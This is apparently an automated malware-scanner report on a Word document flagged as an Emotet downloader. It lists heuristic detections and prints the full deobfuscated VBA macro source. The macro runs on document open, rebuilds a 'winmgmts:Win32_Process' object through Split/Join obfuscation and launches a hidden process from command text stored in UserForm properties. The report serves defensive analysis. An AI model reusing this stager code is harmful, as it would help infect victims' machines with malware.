MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7464930-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11000 bytes |
SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
294 of 513 identifiers look randomly generated (e.g. 'Sctlzdxzxdrqf') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub
Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcmzf = "Perspiciatis."
Qgwdeshxx = 313
Bqwkbpkzip = Ipiwqzcqevo + Afvutucle.Sjrnukxepun + Afvutucle.Rwzjuoionfy.Factoid
Midsxvzperwg = Jqfiynjahuwgy
Kqbfxqpppgz = 953
Gcizenhgztvp = ("Voluptatem voluptates explicabo.")
Aivrxxauau = (262)
Dim Itapczoot As Double
Dim Wbluilxgpo As Integer
Dim Guocaumcnxx As Integer
Dim Fkrwbutvwyq As Integer
Dim Ridomtef As Boolean
Dim Nwnugcyzdhgc As Integer
Dim Jotkskvyr As String
Dyylezim = (155)
Dim Znzntyzm As Double
Ohxeyzumjapfq = ("Amet assumenda corrupti necessitatibus dolores deleniti doloremque magnam tempora.")
Dznzhxqm = (779)
Dim Atwzmvlman As Integer
Tnffwcoo = Hkpymnxzyvuux
Mxedsqegbgzub = Xoqdlmjniyp
Zgzqzijekka = "Terry"
Dnrmsvxk = 745
Wzwxawzlswk = Fmenbjha + Bqwkbpkzip + Fmenbjha
Smdkthrx = Wgxvvyhofof
Xzojgunmfwu = 649
Ecgsrofqyeq = ("Non facilis dicta quisquam.")
Mglsdxmw = (36)
Dim Fxldqcrkcc As Boolean
Dim Einxrazzuxqf As Integer
Dim Bmtwfsyra As Integer
Dim Loohunqus As Integer
Dim Fggmxgqh As String
Dim Vjbfqfwnw As String
Dim Tqfllrajz As Double
Fyhnqtvrbtm = (620)
Dim Fmbdhugwovm As Integer
Amoqxitg = ("Quibusdam laudantium harum.")
Xdpdsemn = (132)
Dim Pgyqwbfetqc As Boolean
Ptidkvehiajda = Orchfzltoyt
Onnadfaj = Brcihfom
Oqboupydzu = "Jordan"
Absumjaurhe = 652
End Function
Function Odmoouhgcoht()
Wgigiqzqxuh = Beloxxtqz
Gnpvdhwvmmp = 125
Spivnsjekyev = ("Qui et qui sunt qui enim.")
Anfzxlraubdnq = (843)
Dim Xtmjsvioxd As Integer
Dim Lvplzqhwhg As Boolean
Dim Ibsuhszcltne As Boolean
Dim Ueryiwqzfe As Double
Dim Exjbeqguarc As Double
Dim Edeasiksn As Double
Dim Ejyqbjvo As Integer
Nbtjpwyxkcb = (622)
Dim Dsmymwuxqbf As Integer
Sptrvoxqrbkr = ("Qui.")
Lvdtbasuyo = (56)
Dim Rvtxanmud As String
Thngamqbh = Ibniewcyqe
Wbwtbxfjicq = Ourihndzin
Siprfsamtq = "Ea ea itaque exercitationem repudiandae quisquam autem quos aut."
Tpdbzafl = 438
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
Mmbtadhosa = Ujbivtkuivmq
Jkwfonuxulzsv = 121
Ahhjvarmv = ("Quis ratione cum aliquam sit quaerat veniam aliquid.")
Ezbqzlddtxrnm = (23)
Dim Xpqicympiofgt As Integer
Dim Xaooiuvdloor As Double
Dim Ituqydcvm As String
Dim Rkscueji As Integer
Dim Ryyjdble As Double
Dim Hiizulpvsqb As Integer
Dim Mrkdbrje As Double
Grvvhvcq = (625)
Dim Zuibtijpopky As Boolean
Lssyknljxfchy = ("Amet ipsa et nihil ut.")
Zqakvbsii = (354)
Dim Huptsioxjpcd As Integer
Gqwczljt = Zknhwtjjosf
Enttbftxmuho = Gjyionbtivgb
Sonxpwspf = "Ramiro"
Onrnpgsky = 687
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
Zxrjsuuw = Pvngwezxeacp
Grembiahqre = 889
Cqfnaurkgq = ("Consequuntur.")
Pfyxryjyadb = (135)
Dim Vhtiewbmrw As Double
Dim Mcvhgzavylccj As Double
Dim Vmlzppeemxbb As String
Dim Bxiryfwoq As Double
Dim Atkkfryf As Boolean
Dim Zgxrjhxij As Double
Dim Goxntlkuvgvrv As Integer
Uthgdwqabrlao = (353)
Dim Fgqftfmwlfnli As Integer
Obbnmeac = ("Nemo.")
Qovwilvw = (128)
Dim Paqvqhxv As Double
Kiaxcjyblue = Ddqqadurolz
Lfxegfclqhn = Znulcvllmszr
Gxwwbioxsdgn = "Quis inventore sit hic quo."
Dnvdshdh = 152
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText + Afvutucle.Kwnqamuppcgx.ControlTipText
Utsrjsymed = Iaqmfqkywvm
Ratfxsjlktiev = 848
Fdfidtusqzxgb = ("Sed est.")
Yhjsssfhhly = (114)
Dim Hhhknlttqeffw As Boolean
Dim Gzlhyvva As Integer
Dim Jhavywfp As Boolean
Dim Irnsqtwicd As Integer
Dim Kcbhzqfclgmhd As String
Dim Xrizqawtomsr As Integer
Dim Nyrqnwxurwpjt As Integer
Fgomzzqu = (831)
Dim Vojnvhzbeyiu As Double
Hwcalkhgwri = ("Ut quia.")
Fezwdovs = (418)
Dim Hvpqhpbtlqz As String
Wqjtoorr = Dtwfbfguxzi
Vuzruywoe = Cguuhdqw
Mwkjzofvb = "Facere qui."
Alnyowwthayt = 436
Esydxetckuhsv = Sheihghumywl + Rnuekdgnz.Aklhsdytvadu
Fdzemvjzjsifz = Cswaathrat
Vqtwcrbwnhsy = 809
Wlpvpsfiqmb = ("Omnis enim iste et iste.")
Eylzkkbn = (706)
Dim Wfoyqwvzxbm As Double
Dim Bfdjomzhvknxx As Boolean
Dim Hoxamvtqb As Double
Dim Lumdrrhcjug As Double
Dim Akhbuabsun As Boolean
Dim Dlkaiocoaa As Boolean
Dim Rtwpvsoanlzc As Double
Vbtvrhutnfwc = (409)
Dim Emmafmjbd As String
Czqwrlhlqtbve = ("Accusantium officiis qui possimus.")
Ayfqttqiwazzx = (4)
Dim Uxhypidxw As Integer
Qlldqhqillv = Dlquvslkjhyd
Uoxajwecf = Krjprxykpvds
Diehdmzc = "Est provident aut molestias sint."
Tokmqoaftblbc = 731
Set Odmoouhgcoht = CreateObject(Esydxetckuhsv)
Zuzigbnzsb = Zxtmwbojbmwh
Axiixnqfhp = 763
Wvsykzdw = ("Earnest")
Bdbkbgjnysbu = (557)
Dim Rjepeuqeose As Boolean
Dim Cbwekzjvehm As Boolean
Dim Vurfcbucha As String
Dim Srbxpjgipgl As Integer
Dim Rvrvmcseuyw As String
Dim Qdzouabrr As Double
Dim Xpygduoip As Integer
Fchuydiyte = (380)
Dim Tcjbmkzwz As Boolean
Xxelazjnxq = ("Voluptatem.")
Whacyitodmifd = (803)
Dim Cxqvlssjxtri As String
Rnqoemumib = Zglpziggg
Vtfdydihz = Lysrziyqp
Gsmxiujcr = "Voluptatem aut."
Guuziviz = 797
Odmoouhgcoht.XSize = False
Gqlargef = Jpxqfekyxlfc
Wvpwogxua = 281
Zxagnpirmhzq = ("Velit sapiente exercitationem.")
Ptbefyez = (788)
Dim Vqhqjtpom As Double
Dim Gjrjvwleb As String
Dim Xuynwqvmp As Integer
Dim Wkxirhsrkeuw As String
Dim Jukbsvchqs As Double
Dim Wxytzihlmgmm As String
Dim Ljladyoc As Boolean
Lkwdsoueuzkv = (671)
Dim Empxydixxpks As String
Podukdhpldt = ("Leland")
Hrfspqtvrj = (35)
Dim Jnongszs As Integer
Gvqlpkoalea = Frwvccux
Qaqtcekufj = Kcdbjgqxmd
Ivkxxpirai = "In fuga."
Yqmvbjuhit = 723
Odmoouhgcoht.YSize = False
Thpffxgixhx = Ygkkkvjo
Mkarpmclq = 561
Sdhwpcojh = ("Amet necessitatibus voluptatibus assumenda eius eum est nesciunt totam.")
Wfrmjedm = (964)
Dim Wzdvefrwvvhlu As Double
Dim Cnutuepj As Integer
Dim Vacdxiehgwe As Integer
Dim Kwwmldvk As Integer
Dim Jgritjuhqu As Boolean
Dim Fptxmdeojy As Boolean
Dim Kwxsdfndko As Boolean
Gzkxlonjuarhs = (950)
Dim Sfwblifywlc As Integer
Gdzqxwqmsg = ("Ex et est labore quia quasi repellendus et.")
Korjfqzoovyn = (442)
Dim Obbnmjkcc As Integer
Akvydzzu = Tnorucpw
Mdqiolfut = Laiegdqkw
Gguonvrgvgrm = "Ducimus totam omnis."
Unjsueawthngn = 580
Do While Klymuqeo.Create(UJNDB & Wzwxawzlswk, Watbnmftlfyf, Odmoouhgcoht, Ednkgktl)
Loop
Gbpywqsedvzbt = Yfbpvtnn
Dkchnmvtpz = 440
Swwswjbayyyy = ("Jackie")
Ecketnpptgp = (313)
Dim Idhddzfmetc As Double
Dim Mzkfmdaa As Boolean
Dim Ilfmdcdpdaus As Double
Dim Vvzcbzjhhqb As Double
Dim Oulwpajyr As Integer
Dim Ckbdzwitct As String
Dim Exzikbeolmw As String
Sdfrnsdxmaqyf = (431)
Dim Hhomecgyqs As String
Njbpnlhhtdcoa = ("Omnis et saepe.")
Sxikesugdykl = (298)
Dim Eoznuqokkd As Integer
Bqefzlxjnbhiu = Cyrdaovoocag
Imfxfrdcx = Njxdgrtpxmmtz
Gbpcyfhdfo = "Quo dolores."
Pnpzatemex = 632
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.